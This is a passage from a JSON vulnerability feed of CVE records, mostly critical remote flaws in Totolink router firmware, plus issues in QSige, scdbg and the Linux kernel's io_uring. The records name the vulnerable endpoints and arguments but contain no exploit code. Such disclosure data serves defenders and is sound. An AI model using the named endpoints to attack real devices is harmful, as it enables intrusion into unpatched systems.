identifier of this vulnerability is VDB-250788. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:totolink:lr1200gb_firmware:9.1.0u.6619_b20230130:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:totolink:lr1200gb:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-16T14:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0573", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/3/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/3/README.md", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/3/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/3/README.md", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250789", "name" : "https://vuldb.com/?ctiid.250789", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250789", "name" : "https://vuldb.com/?ctiid.250789", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250789", "name" : "https://vuldb.com/?id.250789", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250789", "name" : "https://vuldb.com/?id.250789", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in Totolink LR1200GB 9.1.0u.6619_B20230130 and classified as critical. Affected by this vulnerability is the function setDiagnosisCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument ip leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250789 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:totolink:lr1200gb_firmware:9.1.0u.6619_b20230130:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:totolink:lr1200gb:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-16T15:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0574", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/4/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/4/README.md", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/4/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/4/README.md", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250790", "name" : "https://vuldb.com/?ctiid.250790", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250790", "name" : "https://vuldb.com/?ctiid.250790", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250790", "name" : "https://vuldb.com/?id.250790", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250790", "name" : "https://vuldb.com/?id.250790", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Totolink LR1200GB 9.1.0u.6619_B20230130 and classified as critical. Affected by this issue is the function setParentalRules of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument sTime leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250790 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:totolink:lr1200gb_firmware:9.1.0u.6619_b20230130:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:totolink:lr1200gb:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-16T15:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0575", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/5/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/5/README.md", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/5/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/5/README.md", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250791", "name" : "https://vuldb.com/?ctiid.250791", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250791", "name" : "https://vuldb.com/?ctiid.250791", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250791", "name" : "https://vuldb.com/?id.250791", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250791", "name" : "https://vuldb.com/?id.250791", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Totolink LR1200GB 9.1.0u.6619_B20230130. It has been classified as critical. This affects the function setTracerouteCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument command leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250791. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:totolink:lr1200gb_firmware:9.1.0u.6619_b20230130:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:totolink:lr1200gb:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-16T15:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0576", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/6/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/6/README.md", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/6/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/6/README.md", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250792", "name" : "https://vuldb.com/?ctiid.250792", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250792", "name" : "https://vuldb.com/?ctiid.250792", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250792", "name" : "https://vuldb.com/?id.250792", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250792", "name" : "https://vuldb.com/?id.250792", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Totolink LR1200GB 9.1.0u.6619_B20230130. It has been declared as critical. This vulnerability affects the function setIpPortFilterRules of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument sPort leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250792. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:totolink:lr1200gb_firmware:9.1.0u.6619_b20230130:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:totolink:lr1200gb:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-16T16:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0577", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/7/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/7/README.md", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/7/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/7/README.md", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250793", "name" : "https://vuldb.com/?ctiid.250793", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250793", "name" : "https://vuldb.com/?ctiid.250793", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250793", "name" : "https://vuldb.com/?id.250793", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250793", "name" : "https://vuldb.com/?id.250793", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Totolink LR1200GB 9.1.0u.6619_B20230130. It has been rated as critical. This issue affects the function setLanguageCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument lang leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250793 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:totolink:lr1200gb_firmware:9.1.0u.6619_b20230130:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:totolink:lr1200gb:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-16T16:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0578", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/8/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/8/README.md", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/8/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/8/README.md", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250794", "name" : "https://vuldb.com/?ctiid.250794", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250794", "name" : "https://vuldb.com/?ctiid.250794", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250794", "name" : "https://vuldb.com/?id.250794", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250794", "name" : "https://vuldb.com/?id.250794", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical has been found in Totolink LR1200GB 9.1.0u.6619_B20230130. Affected is the function UploadCustomModule of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument File leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250794 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:totolink:lr1200gb_firmware:9.1.0u.6619_b20230130:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:totolink:lr1200gb:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-16T16:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0579", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/X2000R/1/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/X2000R/1/README.md", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/X2000R/1/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/X2000R/1/README.md", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250795", "name" : "https://vuldb.com/?ctiid.250795", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250795", "name" : "VDB-250795 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250795", "name" : "https://vuldb.com/?id.250795", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250795", "name" : "VDB-250795 | Totolink X2000R formMapDelDevice command injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.263721", "name" : "Submit #263721 | TOTOLINK X2000R V1.0.0-B20221212.1452 command injection", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.totolink.net/", "name" : "https://www.totolink.net/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in Totolink X2000R 1.0.0-B20221212.1452. Affected by this vulnerability is the function formMapDelDevice of the file /boafrm/formMapDelDevice. The manipulation of the argument macstr leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:totolink:x2000r_firmware:1.0.0-b20221212.1452:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:totolink:x2000r:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-16T17:15Z", "lastModifiedDate" : "2025-06-03T09:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0580", "ASSIGNER" : "cve-coordination@incibe.es" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/omission-key-controlled-authorization-qsige", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/omission-key-controlled-authorization-qsige", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/omission-key-controlled-authorization-qsige", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/omission-key-controlled-authorization-qsige", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Omission of user-controlled key authorization in the IDMSistemas platform, affecting the QSige product. This vulnerability allows an attacker to extract sensitive information from the API by making a request to the parameter '/qsige.locator/quotePrevious/centers/X', where X supports values 1,2,3, etc." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:idmsistemas:sinergia:2.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-18T09:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0581", "ASSIGNER" : "cve-coordination@incibe.es" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-400" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/uncontrolled-resource-consumption-vulnerability-sandsprite-scdbg", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/uncontrolled-resource-consumption-vulnerability-sandsprite-scdbg", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/uncontrolled-resource-consumption-vulnerability-sandsprite-scdbg", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/uncontrolled-resource-consumption-vulnerability-sandsprite-scdbg", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An Uncontrolled Resource Consumption vulnerability has been found on Sandsprite Scdbg.exe, affecting version 1.0. This vulnerability allows an attacker to send a specially crafted shellcode payload to the '/foff' parameter and cause an application shutdown. A malware program could use this shellcode sequence to shut down the application and evade the scan." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:sandsprite:scdbg:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 5.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-16T14:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0582", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-416" } ] } ] }, "references" : { "reference_data" : [ { "url" : "http://www.openwall.com/lists/oss-security/2024/04/24/3", "name" : "http://www.openwall.com/lists/oss-security/2024/04/24/3", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0582", "name" : "https://access.redhat.com/security/cve/CVE-2024-0582", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0582", "name" : "https://access.redhat.com/security/cve/CVE-2024-0582", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://bugs.chromium.org/p/project-zero/issues/detail?id=2504", "name" : "https://bugs.chromium.org/p/project-zero/issues/detail?id=2504", "refsource" : "", "tags" : [ "Issue Tracking", "Mailing List" ] }, { "url" : "https://bugs.chromium.org/p/project-zero/issues/detail?id=2504", "name" : "https://bugs.chromium.org/p/project-zero/issues/detail?id=2504", "refsource" : "", "tags" : [ "Issue Tracking", "Mailing List" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2254050", "name" : "RHBZ#2254050", "refsource" : "", "tags" : [ "Issue Tracking", "Patch", "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2254050", "name" : "RHBZ#2254050", "refsource" : "", "tags" : [ "Issue Tracking", "Patch", "Third Party Advisory" ] }, { "url" : "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c392cbecd8eca4c53f2bf508731257d9d0a21c2d", "name" : "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c392cbecd8eca4c53f2bf508731257d9d0a21c2d", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c392cbecd8eca4c53f2bf508731257d9d0a21c2d", "name" : "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c392cbecd8eca4c53f2bf508731257d9d0a21c2d", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A memory leak flaw was found in the Linux kernel’s io_uring functionality in how a user registers a buffer ring with IORING_REGISTER_PBUF_RING, mmap() it, and then frees it. This flaw allows a local user to crash or potentially escalate their privileges on the system." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:6.7:rc1:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : 